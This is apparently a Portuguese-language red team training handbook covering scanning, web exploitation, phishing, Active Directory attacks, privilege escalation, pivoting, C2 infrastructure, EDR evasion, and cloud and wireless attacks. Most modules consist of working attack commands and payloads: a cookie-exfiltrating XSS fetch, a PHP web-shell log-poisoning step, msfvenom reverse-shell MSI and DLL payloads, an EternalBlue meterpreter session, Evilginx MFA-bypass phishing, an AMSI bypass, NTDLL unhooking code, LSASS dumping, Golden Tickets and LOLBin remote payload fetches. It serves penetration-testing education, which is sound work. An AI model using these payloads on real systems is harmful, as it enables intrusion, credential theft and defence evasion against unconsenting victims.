# snmpwalk — enumeração via SNMP v2c
snmpwalk -v2c -c public [Link]
Página 19 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
4.2 Vulnerability Scanning
4.2.1 Greenbone Community Edition (GCE) — Anteriormente OpenVAS
A Greenbone Networks padronizou a nomenclatura: o projeto open-source é chamado Greenbone
Community Edition (GCE) ou GVM (Greenbone Vulnerability Management). OpenVAS é o engine de
scan interno. Em 2026, o GVM está na série 23.x.
# Instalação via Docker (método recomendado para lab)
git clone [Link]
# Alternativa com compose oficial:
curl -f -O [Link]
docker compose -f [Link] -p greenbone-community-edition pull
docker compose -f [Link] -p greenbone-community-edition up -d
# Acessar interface web
# [Link] — user: admin, senha: gerada no primeiro start
4.2.2 Nuclei v3
nuclei -update-templates
nuclei -u [Link] -tags cve,sqli,xss,rce -o nuclei_output.txt
nuclei -l live_hosts.txt -t network/ -severity critical,high -o network_vulns.txt
4.3 Web — OWASP Top 10 (2025)
A versão 2025 do OWASP Top 10 foi publicada em novembro de 2025. Dois novos itens foram
introduzidos (A03 e A10) e o SSRF foi consolidado no A01. A versão 2021 ainda é amplamente
referenciada em compliance — ambas são relevantes.
Rank 2025 Categoria Ferramentas de Teste
A01 Broken Access Control (inclui Burp Auth Analyzer, ffuf, autorize,
SSRF) nmap
A02 Security Misconfiguration Nuclei, nikto, ScoutSuite, [Link]
A03 Software Supply Chain Failures OWASP Dependency-Check,
(Novo) [Link], Trivy
A04 Cryptographic Failures [Link], sslyze, sslscan, Burp
A05 Injection (SQL/NoSQL/OS/LDAP) SQLMap, NoSQLMap, Burp Suite
A06 Insecure Design Manual review, threat modeling,
STRIDE
A07 Authentication Failures Hydra, Medusa, Burp Intruder,
kerbrute
A08 Software and Data Integrity Failures CI/CD review, SCA tools
A09 Logging and Alerting Failures Manual assessment, SIEMs,
observability
Página 20 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
A10 Mishandling of Exceptional Fuzzing, manual testing, análise de
Conditions (Novo) erros
OWASP Top 10 2025 — [Link]/Top10/ → [Link]
OWASP WSTG v4.2 — [Link]/www-project-web-security-testing-guide/ → [Link]
web-security-testing-guide/
4.4 Burp Suite Pro — Extensões Essenciais (2025)
Extensão Função
Param Miner Descoberta de parâmetros ocultos e cache poisoning
Turbo Intruder Fuzzing de alto desempenho — race conditions
Auth Analyzer Testes de autorização horizontal e vertical (BOLA)
JWT Editor Manipulação e ataques em JSON Web Tokens
Hackvertor Encoding, transformações e ofuscação de payloads
Active Scan++ Extensão de scanner ativo com detecções adicionais
CSRF Scanner Detecção automatizada de vulnerabilidades CSRF
Página 21 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
MÓDULO 5 — EXPLORAÇÃO (EXPLOITATION)
5.1 Metasploit Framework 6.x
msfconsole -q
search type:exploit platform:windows cve:2024
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS [Link]
set LHOST [Link]
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run
Meterpreter — Comandos Essenciais
Comando Função
sysinfo / getuid Informações do sistema e usuário atual
getsystem Tenta elevação automática de privilégios (vários métodos)
load kiwi Carrega o módulo Kiwi (Mimikatz integrado)
kiwi_cmd sekurlsa::logonpasswords Extrai credenciais da memória LSASS
run Lista exploits locais aplicáveis
post/multi/recon/local_exploit_suggester
portfwd add -l 8080 -r [Link] -p 80 Port forwarding pela sessão
route add [Link]/24 SESSION_ID Pivoting de rede via sessão Meterpreter
background / sessions -i 1 Gerenciamento de sessões múltiplas
5.2 Exploração Manual de Vulnerabilidades Web
5.2.1 SQL Injection
# SQLMap — detecção e exploração automatizada
sqlmap -u '[Link] --dbs --batch
sqlmap -u '[Link] -D database -T users --dump
sqlmap -u '[Link] --os-shell # Shell via DBMS
# SQLi manual — boolean-based blind
' AND 1=1-- - # Condição TRUE
' AND 1=2-- - # Condição FALSE
# Time-based blind
'; IF (1=1) WAITFOR DELAY '0:0:5'-- - # MSSQL
' AND SLEEP(5)-- - # MySQL
Página 22 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
5.2.2 Cross-Site Scripting (XSS)
# Payloads básicos de teste
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
# XSS para exfiltração de cookies
<script>fetch('[Link]
5.2.3 Local File Inclusion (LFI)
# LFI básico
[Link]
# PHP wrapper — leitura de código-fonte em base64
[Link]
# Log Poisoning via LFI (requer acesso ao log de acesso)
curl -A '<?php system($_GET["cmd"]); ?>' [Link]
[Link]
5.2.4 SSRF (Server-Side Request Forgery)
Nota: no OWASP Top 10 2025, o SSRF foi consolidado dentro de A01 (Broken Access Control),
refletindo sua natureza de violação de fronteiras de confiança.
# SSRF para metadata AWS EC2 (IMDSv1)
[Link]
# Técnicas de bypass de filtros SSRF
[Link] # Octal
[Link] # Decimal ([Link])
[Link] # Hexadecimal
[Link] # Short notation
5.2.5 JWT Attacks
# Algoritmo 'none' — remover assinatura
# Modificar header para: {"alg":"none"} e remover a assinatura
# RS256 → HS256 algorithm confusion
# Assinar com a chave pública RSA usando HMAC
# Brute force do secret com hashcat
hashcat -a 0 -m 16500 jwt_token.txt /usr/share/wordlists/[Link]
# jwt_tool — manipulação e teste de JWTs
python3 jwt_tool.py TOKEN -T # Tamper interativo
Página 23 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
python3 jwt_tool.py TOKEN -C -d [Link] # Crack
Página 24 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
MÓDULO 6 — ENGENHARIA SOCIAL E PHISHING
6.1 Ferramentas de Phishing
Ferramenta Status (2026) Uso Principal
GoPhish v0.12+ Ativo — Campanhas de phishing completas
[Link]/gophish/gophish e rastreáveis
Evilginx3 Ativo — Adversary-in-the-Middle (AiTM) —
[Link]/kgretzky/evilginx2 bypass de MFA
EvilnoVNC Ativo Phishing com sessão ao vivo no
browser da vítima
Modlishka Ativo Reverse proxy phishing alternativo
⚠️ ATENÇÃO — GoPhish
O GoPhish possui vulnerabilidades documentadas em versões mais antigas (ex: CSRF).
Em ambientes de produção, configurar atrás de proxy reverso (Nginx/Caddy) com TLS,
restringir acesso à interface de admin, usar domínio dedicado e válido com
DKIM/SPF/DMARC configurados. O GoPhish não foi projetado para ser exposto
diretamente à internet.
6.2 GoPhish — Campanha Completa
wget [Link]
unzip [Link] && chmod +x gophish
# Editar [Link]: admin_server com bind_address para localhost
./gophish # Interface admin: [Link]
Fluxo de Campanha
1. Criar Sending Profile — configurar relay SMTP (Mailgun, SendGrid ou SMTP próprio com
DKIM/SPF)
2. Criar Email Template — clonar email legítimo da organização-alvo com pretexto convincente
3. Criar Landing Page — clone da página de login com captura de credenciais
4. Criar User Group — importar lista de emails obtida no OSINT
5. Lançar Campaign — combinar todos os elementos com janela de tempo definida
6. Monitorar dashboard — taxa de abertura, cliques, credenciais capturadas, tempo de reação
6.3 Evilginx3 — Adversary-in-the-Middle (AiTM)
Página 25 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
Evilginx3 atua como proxy reverso entre a vítima e o serviço legítimo, capturando tokens de sessão
autenticados mesmo quando MFA está habilitado. O repositório permanece nomeado 'evilginx2' no
GitHub.
# Clonar e compilar
git clone [Link]
cd evilginx2 && make
# Configuração básica
:config domain [Link]
:config ipv4 IP_DO_SERVIDOR
# Carregar phishlet (ex: Microsoft 365)
:phishlets hostname o365 [Link]
:phishlets enable o365
:lures create o365
:lures get-url 0 # URL de phishing para enviar à vítima
:sessions # Listar sessões capturadas
:sessions get 1 # Ver tokens e cookies da sessão
🛡️ DEFESA CONTRA AITM
Evilginx captura tokens de sessão mesmo com MFA via SMS, TOTP ou push notification.
Defesas eficazes contra AiTM: FIDO2/Passkeys (phishing-resistant — vinculam
autenticação à origem), Microsoft Entra ID Conditional Access com device compliance,
Token Binding. MFA via SMS e TOTP NÃO protegem contra AiTM.
6.4 Spear Phishing com AI (2026)
O uso de LLMs para geração de conteúdo de engenharia social altamente personalizado é um vetor
em crescimento documentado em 2025-2026. Operadores de Red Team utilizam LLMs para geração
de pretextos baseados em OSINT de LinkedIn, revisão gramatical de emails em idioma nativo do alvo
e criação de documentos com metadados plausíveis. Ferramentas de síntese de voz (clones de voz)
são usadas em cenários de vishing em operações avançadas.
Página 26 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
MÓDULO 7 — ACTIVE DIRECTORY ATTACKS
7.1 Enumeração de Active Directory
7.1.1 BloodHound CE — Coleta de Dados
# RustHound — coletor AD em Rust, executável em Linux
rusthound -d [Link] -u user@[Link] -p 'password' --zip -o /tmp/bh/
# SharpHound v2 — coletor Windows (executar em máquina do domínio)
.\[Link] -c All,GPOLocalGroup --zipfilename bh_data.zip
# [Link] — alternativa Python
bloodhound-python -d [Link] -u user -p 'password' -ns DC_IP -c all --zip
# Queries Cypher úteis no BloodHound
// Caminhos mais curtos para Domain Admins
MATCH p=shortestPath((u:User {enabled:true})-[*1..]->(g:Group {name:'DOMAIN
ADMINS@[Link]'})) RETURN p
// Computadores com sessão de Domain Admin
MATCH (c:Computer)-[:HasSession]->(u:User)-[:MemberOf*1..]->(g:Group {name:'DOMAIN
ADMINS@[Link]'}) RETURN c,u
7.2 Ataques de Credenciais
7.2.1 Kerberoasting
Solicita tickets Kerberos para contas de serviço (SPNs) e os quebra offline. Impacta contas com SPNs
registrados e senhas fracas.
# Impacket — Linux
impacket-GetUserSPNs [Link]/user:password -dc-ip [Link] -request -outputfile
[Link]
# Rubeus — Windows
.\[Link] kerberoast /outfile:kerberoast_hashes.txt
# Crack — hashcat modo 13100
hashcat -a 0 -m 13100 [Link] /usr/share/wordlists/[Link]
7.2.2 AS-REP Roasting
Ataca contas sem Kerberos pre-authentication habilitado — solicita AS-REP e quebra o hash offline.
# Impacket — Linux
impacket-GetNPUsers [Link]/ -dc-ip [Link] -no-pass -usersfile [Link] -
format hashcat -outputfile [Link]
Página 27 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
# Crack — hashcat modo 18200
hashcat -a 0 -m 18200 [Link] /usr/share/wordlists/[Link]
7.2.3 Password Spraying
Testa uma senha contra muitos usuários. Atenção ao threshold de bloqueio de conta — Kerbrute é
mais seguro pois valida via Kerberos sem autenticação SMB.
# Kerbrute — validação via Kerberos (evita bloqueio SMB)
./kerbrute passwordspray -d [Link] --dc [Link] [Link] 'Password2024!'
# NetExec — spray via SMB
nxc smb [Link] -u [Link] -p 'Empresa@2025' --continue-on-success --no-bruteforce
7.2.4 Pass-the-Hash (PtH)
# NetExec
nxc smb [Link] -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:NTLM_HASH'
# Impacket psexec
impacket-psexec -hashes ':NTLM_HASH' Administrator@[Link]
# Impacket wmiexec — menos ruidoso que psexec
impacket-wmiexec -hashes ':NTLM_HASH' Administrator@[Link]
7.3 NTLM Relay
# Terminal 1: Responder — captura de hashes NTLM
sudo responder -I eth0 -dwv --disable-ess
# Terminal 2: NTLMrelayx — relay para alvos sem SMB Signing
impacket-ntlmrelayx -tf relay_targets.txt -smb2support -c 'whoami'
# Relay para LDAP — adicionar computador ao domínio
impacket-ntlmrelayx -t ldap://[Link] -smb2support --add-computer
7.4 Escalada no Active Directory
7.4.1 DCSync
# Via Impacket (requer DS-Replication-Get-Changes)
impacket-secretsdump [Link]/administrator:password@[Link] -just-dc
# Mimikatz
lsadump::dcsync /domain:[Link] /user:krbtgt
Página 28 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
7.4.2 Golden Ticket
# Requisitos: hash NTLM do krbtgt e SID do domínio
impacket-ticketer -nthash KRBTGT_NTLM_HASH -domain-sid S-1-5-21-XXXXXXX -domain
[Link] adminfalso
export KRB5CCNAME=[Link]
impacket-psexec -k -no-pass [Link]/adminfalso@[Link]
7.4.3 AD CS Attacks — Certipy (ESC1–ESC16)
Certipy é a referência para ataques em Active Directory Certificate Services. A versão atual suporta
ESC1 a ESC16, incluindo ESC16 adicionado em 2024.
pip3 install certipy-ad # ou pipx install certipy-ad
# Enumerar templates e configurações vulneráveis
certipy find -u user@[Link] -p 'password' -dc-ip [Link] -vulnerable -stdout
# ESC1 — template permite SAN e enrollment aberto
certipy req -u user@[Link] -p 'password' -ca 'TARGET-CA' -template 'VulnTemplate' -
upn 'administrator@[Link]'
certipy auth -pfx [Link] -dc-ip [Link]
# ESC8 — relay NTLM para endpoint HTTP do AD CS
certipy relay -ca '[Link]' -template 'User'
Página 29 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
MÓDULO 8 — ESCALADA DE PRIVILÉGIOS
8.1 Linux Privilege Escalation
8.1.1 Enumeração Automatizada
# LinPEAS — enumeração abrangente de PrivEsc Linux
curl -L [Link] | sh
# pspy — monitorar processos e cron jobs sem root
./pspy64 -pf -i 1000
8.1.2 SUID Binaries
find / -perm -4000 -type f 2>/dev/null
# Consultar GTFOBins para cada binário encontrado: [Link]
# Exemplos comuns
vim -c ':!/bin/sh' # vim SUID
python3 -c 'import os; [Link](0); [Link]("/bin/bash")' # python3 SUID
find /etc -exec /bin/sh \; -quit # find SUID
8.1.3 Sudo Abuse
sudo -l # Listar permissões sudo do usuário atual
# Exploração via GTFOBins
sudo awk 'BEGIN {system("/bin/sh")}'
sudo less /etc/shadow # Em modo interativo: !sh
8.1.4 Cron Jobs
cat /etc/crontab && cat /etc/cron.d/* 2>/dev/null
# Monitorar com pspy para identificar jobs não listados
# Se script em cron tem permissão de escrita: adicionar payload
echo 'chmod +s /bin/bash' >> /opt/[Link]
8.1.5 Vulnerabilidades de Kernel e Sistema (2024–2026)
CVE Descrição e Impacto
CVE-2024-1086 Uso após liberação em nf_tables — escalada local no kernel Linux
CVE-2024-6387 (regreSSHion) Condição de corrida no OpenSSH — versões até 9.7p1 — RCE
remoto
CVE-2023-4911 (Looney Buffer overflow no glibc — escalada via binários SUID
Tunables)
Página 30 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
CVE-2021-4034 (PwnKit) pkexec SUID — ainda presente em sistemas sem patch
8.2 Windows Privilege Escalation
8.2.1 Enumeração Automatizada
.\[Link] > winpeas_output.txt
Import-Module PowerUp.ps1; Invoke-AllChecks
.\[Link] -group=all > seatbelt_output.txt
8.2.2 Token Impersonation — SeImpersonatePrivilege
# PrintSpoofer — explora SeImpersonate via named pipe
.\[Link] -i -c cmd
# GodPotato — suporte a Windows Server 2019/2022
.\[Link] -cmd "cmd /c whoami"
8.2.3 AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Se ambos retornarem 0x1:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[Link] LPORT=4444 -f msi -o
[Link]
msiexec /quiet /qn /i C:\Temp\[Link]
8.2.4 DLL Hijacking
# Usar Procmon no alvo: filtrar por Result = NAME NOT FOUND e extensão .dll
# Gerar DLL maliciosa com msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[Link] LPORT=4444 -f dll -o
missing_lib.dll
# Copiar para o diretório onde a aplicação busca a DLL
Página 31 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
MÓDULO 9 — MOVIMENTO LATERAL E PIVOTING
9.1 Técnicas de Movimento Lateral
9.1.1 Execução Remota
# NetExec — execução de comando via SMB
nxc smb [Link] -u administrator -p 'password' -x 'whoami'
# Impacket wmiexec — via WMI (menos ruidoso)
impacket-wmiexec [Link]/administrator:password@[Link] 'cmd /c whoami'
# Impacket dcomexec — via DCOM
impacket-dcomexec [Link]/administrator:password@[Link] 'cmd /c whoami'
9.2 Pivoting — Ferramentas
9.2.1 Ligolo-ng — Tunneling Transparente
Ligolo-ng é uma ferramenta de pivoting amplamente utilizada em operações modernas por permitir
acesso direto a redes internas sem necessidade de proxychains, via interface TUN no atacante.
# Servidor no atacante
./proxy -selfcert -laddr [Link]:11601
# Agent no pivot host (Windows ou Linux)
.\[Link] -connect [Link] -ignore-cert
# Configurar no servidor
session # Listar sessões
1 # Selecionar sessão
start # Iniciar tunnel
sudo ip route add [Link]/24 dev ligolo
# A partir daí, acessar 192.168.2.x diretamente
9.2.2 Chisel — Tunneling via HTTP
./chisel server -p 8000 --reverse # Atacante
./chisel client [Link] R:socks # Pivot host
# SOCKS5 disponível em [Link]:1080
proxychains4 nxc smb [Link]/24
9.2.3 SSH Tunneling
# Dynamic SOCKS proxy
ssh -D 1080 user@jump_host
echo 'socks5 [Link] 1080' >> /etc/[Link]
Página 32 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
9.3 Credential Dumping
9.3.1 LSASS — Técnicas LOLBin
# Via [Link] — binário assinado pela Microsoft
# Obter PID do LSASS
Get-Process lsass | Select-Object Id
# Criar dump
[Link] C:\Windows\System32\[Link], MiniDump 624 C:\Temp\[Link] full
# Processar dump no Linux
pypykatz lsa minidump [Link]
9.3.2 SAM Database
reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
impacket-secretsdump -sam SAM -system SYSTEM LOCAL
9.3.3 DPAPI — Credential Manager
# DonPAPI — extração automatizada de DPAPI, Chrome, WiFi
python3 [Link] [Link]/user:password@[Link]
Página 33 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
MÓDULO 10 — COMMAND & CONTROL (C2)
10.1 Infraestrutura C2 — Arquitetura em Camadas
Componente Função e OPSEC
Team Server Servidor C2 principal — nunca deve ter IP exposto diretamente
Redirector (Nginx/Caddy) Proxy reverso — filtra tráfego não relacionado ao C2; descartável
CDN (Cloudflare) Ofusca IP real do redirector — categorização de domínio legítima
Aged Domain Domínio com histórico de uso legítimo — evita categorização como
malicioso
Malleable C2 Profile Customiza tráfego para parecer comunicação legítima (ex:
Amazon, Office 365)
HTTPS + TLS válido Certificado Let's Encrypt em domínio real — inspecção TLS não
trivial
10.2 Sliver C2 — Framework Open-Source
Sliver é um framework C2 open-source em Go, mantido pela BishopFox. Amplamente utilizado em
operações Red Team como alternativa ao Cobalt Strike.
curl [Link] | sudo bash
sliver-server
# Gerar implant mTLS
generate --mtls [Link] --os windows --arch amd64 --format exe -s [Link]
# Gerar shellcode para injeção
generate --https [Link] --os windows --arch amd64 --format shellcode -s
[Link]
# Iniciar listeners
mtls --lhost [Link] --lport 8888
https --lhost [Link] --lport 443
# Gerenciar sessões
sessions
use SESSION_ID
whoami; ps; netstat
10.3 Havoc C2
Havoc é um framework C2 open-source com suporte a Demon implants, process injection configurável
e evasão de EDR. Alternativa ao Cobalt Strike para equipes sem licença comercial.
git clone [Link]
Página 34 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
cd Havoc && sudo ./[Link]
./havoc server --profile profiles/[Link]
10.4 Cobalt Strike (Comercial)
Cobalt Strike é um framework C2 comercial amplamente utilizado em operações Red Team enterprise.
Licença anual (~$7.500/operador). Versão atual na série 4.10+.
Feature Descrição
BOF (Beacon Object Files) Executa código na memória do beacon sem criar novo processo
Malleable C2 Profiles Customiza completamente o tráfego HTTP/S do beacon
Sleep Mask Kit Ofusca o beacon em disco enquanto está em modo sleep
UDRL (User-Defined Reflective Loader customizável — evasão de EDR por assinatura de loader
Loader)
Artifact Kit Templates para payloads customizados — substituir stagers
padrão
10.5 OPSEC de Infraestrutura
• Nunca expor o IP real do Team Server — todo tráfego via redirector ou CDN
• Usar domínios com histórico de uso (aged domains) e categorização legítima
• Implementar geofencing no redirector — bloquear IPs de provedores de threat intel e SIEM
vendors
• Configurar sleep e jitter no beacon (ex: sleep 60s, jitter 30%) para evitar beaconing regular
• Segmentar infraestrutura por engajamento — nunca reutilizar IPs ou domínios entre operações
• Eliminar headers e indicadores padrão de frameworks conhecidos (User-Agent, URIs, port
defaults)
# Exemplo Nginx redirector — filtrar por User-Agent
location / {
if ($http_user_agent !~ 'Mozilla.*(Windows|Macintosh)') {
return 302 [Link]
}
proxy_pass [Link]
proxy_ssl_verify off;
}
Página 35 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
MÓDULO 11 — EVASÃO DE DEFESAS (AV/EDR)
11.1 Camadas de Detecção de EDR Moderno
Técnica de Detecção Contramedida do Red Team
Static analysis (assinaturas) Obfuscação, packing, criptografia de payload, polimorfismo
Dynamic analysis (sandbox) Sleep + anti-VM checks, staged payloads, anti-debugging
Kernel-level hooks (ETW, Direct syscalls, unhooking de [Link]
SSDT)
Memory scanning em runtime Sleep masking, heap encryption, segmented shellcode
Behavioral analysis Living Off the Land (LOTL), process injection controlado
ML/AI models de detecção TTPs incomuns, variação de comportamento, baixo volume
Threat intel feeds C2 customizado, indicadores únicos por operação
11.2 AMSI Bypass
O AMSI (Antimalware Scan Interface) intercepta scripts PowerShell e .NET antes da execução.
Patches em memória são técnica conhecida e detectada por EDRs modernos — considerar
alternativas como compilação dinâmica ou loaders nativos.
# Patch clássico via reflection
$a=[Ref].[Link]('[Link]'+'siUtils')
$b=$[Link]('amsi'+'InitFailed','NonPublic,Static')
$[Link]($null,$true)
11.3 Direct Syscalls — Evasão de Hooks de EDR
EDRs hookam funções de [Link] em userland para interceptar chamadas de sistema. Direct syscalls
executam o syscall diretamente, contornando os hooks.
# SysWhispers3 — gerador de stubs de syscall direto
python3 [Link] --preset common -o syscalls
# Gera syscalls.h e [Link] com stubs para funções NT comuns
# Hell's Gate / Halos Gate — resolução dinâmica de IDs de syscall em runtime
# Varre a memória de ntdll para encontrar IDs mesmo com hooks parciais
11.4 Userland Unhooking — Recarregar NTDLL Limpa
// Abrir [Link] do disco (não hookada)
HANDLE hFile = CreateFileA("C:\\Windows\\System32\\[Link]",
GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
HANDLE hMap = CreateFileMapping(hFile, NULL, PAGE_READONLY|SEC_IMAGE, 0, 0, NULL);
LPVOID pClean = MapViewOfFile(hMap, FILE_MAP_READ, 0, 0, 0);
Página 36 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
// Copiar seção .text da ntdll limpa sobre a ntdll hookada em memória
11.5 Living Off the Land Binaries (LOLBins)
Referência completa: [Link] — lista atualizada pela comunidade.
Binário Técnica Exemplo de Comando
[Link] Download de arquivo certutil -urlcache -split -f
[Link] [Link]
[Link] Execução de HTA remoto mshta
[Link]
[Link] Execução de COM scriptlet regsvr32 /s /n /u
/i:[Link]
[Link]
[Link] Execução de DLL rundll32 [Link],EntryPoint
[Link] Instalação de MSI remoto msiexec /q /i
[Link]
[Link] Execução remota de processo wmic /node:TARGET process call
create 'cmd /c ...'
11.6 Técnicas de Process Injection
Técnica Descrição
Classic DLL Injection VirtualAllocEx + WriteProcessMemory + CreateRemoteThread no
processo alvo
Process Hollowing Criar processo suspenso, substituir imagem com payload, retomar
execução
APC Injection Inserir Asynchronous Procedure Call em thread alertable de
processo alvo
Early Bird APC Injetar APC antes do EntryPoint do processo ser chamado
Module Stomping Sobrescrever seção de código de módulo legítimo já carregado
Thread Hijacking Suspender thread existente, modificar contexto de registradores,
retomar
Página 37 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
MÓDULO 12 — CLOUD RED TEAM
12.1 AWS Red Team
# Enumeração inicial com credenciais comprometidas
aws sts get-caller-identity
aws iam list-users && aws iam list-roles
aws s3 ls && aws ec2 describe-instances --query
'Reservations[].Instances[].[InstanceId,PublicIpAddress,Tags]'
# Pacu — framework Red Team para AWS
pip3 install pacu # ou pipx install pacu
pacu
> import_keys --all
> run iam__enum_permissions
> run iam__privesc_scan
# IMDSv1 — metadata via SSRF (se não mitigado)
curl [Link]
# ScoutSuite — auditoria multi-cloud
scout aws --report-dir ./scoutsuite-report
12.2 Azure / Entra ID Red Team
# ROADtools — enumeração de Entra ID
pip3 install roadtools
roadrecon gather -u user@[Link] -p 'password'
roadrecon gui # Interface visual em [Link]
# Device Code Phishing — bypass de MFA via OAuth
curl -X POST [Link] \
-d 'client_id=14d82eec-204b-4c2f-b7e8-
296a70dab67e&resource=[Link]
# Enviar ao alvo: [Link] → inserir código exibido
# TokenTactics v2 — manipulação de tokens OAuth pós-captura
Import-Module TokenTactics.psd1
Get-AzureToken -Client MSGraph
12.3 Kubernetes Red Team
kubectl get pods --all-namespaces
kubectl get secrets --all-namespaces -o yaml # Se autorizado
kubectl auth can-i --list # Verificar permissões do contexto atual
# Peirates — ferramenta de Red Team para Kubernetes
Página 38 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
./peirates # Menu interativo
# Container escape — privileged container
# Montar disco do host
mount /dev/sda1 /mnt/host && chroot /mnt/host
12.4 Ferramentas Multi-Cloud
Ferramenta Função
ScoutSuite Auditoria multi-cloud (AWS, Azure, GCP, Alibaba)
Pacu Red Team focado em AWS — módulos de escalada e exploração
ROADtools Enumeração de Entra ID / Azure AD
Peirates Red Team Kubernetes
CloudFox Enumeração de recursos cloud para Red Team (AWS, Azure —
2024+)
gcpwn Framework Red Team para GCP (ativo em 2024+)
Página 39 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
MÓDULO 13 — WIRELESS E PHYSICAL RED TEAM
13.1 Wireless Attacks
WPA2 — Captura de Handshake e PMKID
# Habilitar monitor mode
sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon # Deauth para forçar reconexão
# PMKID Attack — sem necessidade de capturar handshake completo
sudo hcxdumptool -i wlan0mon -o [Link] --enable_status=1
hcxpcapngtool [Link] -o hashes.hc22000
hashcat -a 0 -m 22000 hashes.hc22000 /usr/share/wordlists/[Link]
Evil Twin — Captura de Credenciais EAP Empresarial
# EAPHammer — simula AP corporativo e captura credenciais MSCHAPv2
python3 eaphammer --bssid AA:BB:CC:DD:EE:FF --essid 'CorpWifi' --wpa 2 --auth wpa-eap --
interface wlan0mon --creds
13.2 RFID / NFC Cloning
Dispositivo Capacidade
Proxmark3 (iceman fork) Clone HID ProxCard, MIFARE Classic/Ultralight, EM4100 —
referência de mercado
Flipper Zero RFID 125kHz, NFC, SubGHz, IR, GPIO — portátil e discreet
ACR122U + libnfc NFC cloning de baixo custo para laboratório
# Proxmark3 — ler e clonar cartão HID
pm3 -> lf hid read
pm3 -> lf hid clone -r CARD_DATA
13.3 Social Engineering Físico
• Tailgating / Piggybacking — seguir funcionários em entradas com controle de acesso
• Impersonação — falso técnico de manutenção, delivery, auditor externo
• Badge cloning — clonar crachá RFID durante aproximação social em distância curta
• Dumpster diving — análise de lixo corporativo para documentos e mídias descartadas
• Shoulder surfing — observação visual de telas, teclados e credenciais
Página 40 | Uso Educacional — Conteúdo Autorizado | Be Safe — Mariana BS
RED TEAM OPERATIONS 2026 | Be Safe — Mariana BS
MÓDULO 14 — RELATÓRIOS, FRAMEWORKS E
COMUNICAÇÃO
14.1 Frameworks de Relatório e Metodologia
O relatório é o produto tangível do engajamento. A escolha do framework metodológico define como o
trabalho é estruturado, documentado e comunicado. Os principais frameworks utilizados na indústria
em 2026:
14.1.1 PTES — Penetration Testing Execution Standard
O PTES ([Link]) é uma das metodologias mais referenciadas na indústria para
estruturação de testes de intrusão. Define 7 fases principais:
Fase PTES Descrição Deliverable
1. Pre-engagement Escopo, contratos, RoE, objetivos, Statement of Work, RoE assinado
critérios de sucesso
2. Intelligence Gathering OSINT, recon ativo e passivo, Relatório de reconhecimento
mapeamento de superfície
3. Threat Modeling Identificação de ameaças Modelo de ameaças, árvore de
relevantes ao alvo ataque
4. Vulnerability Analysis Identificação e validação de Lista priorizada de vulnerabilidades
vulnerabilidades
5. Exploitation Exploração controlada para Evidências de comprometimento
demonstrar impacto
6. Post Exploitation Pivoting, persistência, coleta de Crown jewels atingidos, impacto
dados sensíveis documentado
7. Reporting Documentação completa — Relatório final (PDF/Word)
executivo e técnico
PTES — [Link] → [Link]
14.1.2 OSSTMM — Open Source Security Testing Methodology Manual
O OSSTMM v3 ([Link]) é uma metodologia orientada a métricas e resultados quantificáveis.
Introduz o conceito de RAV (Risk Assessment Values) e é agnóstico a tecnologia. Utilizado
especialmente em auditorias e conformidade.
OSSTMM v3 — [Link]/[Link] → [Link]
14.1.3 NIST SP 800-115
Technical Guide to Information Security Testing and Assessment do NIST. Referência formal para
órgãos governamentais e organizações que precisam de framework auditável e documentado.
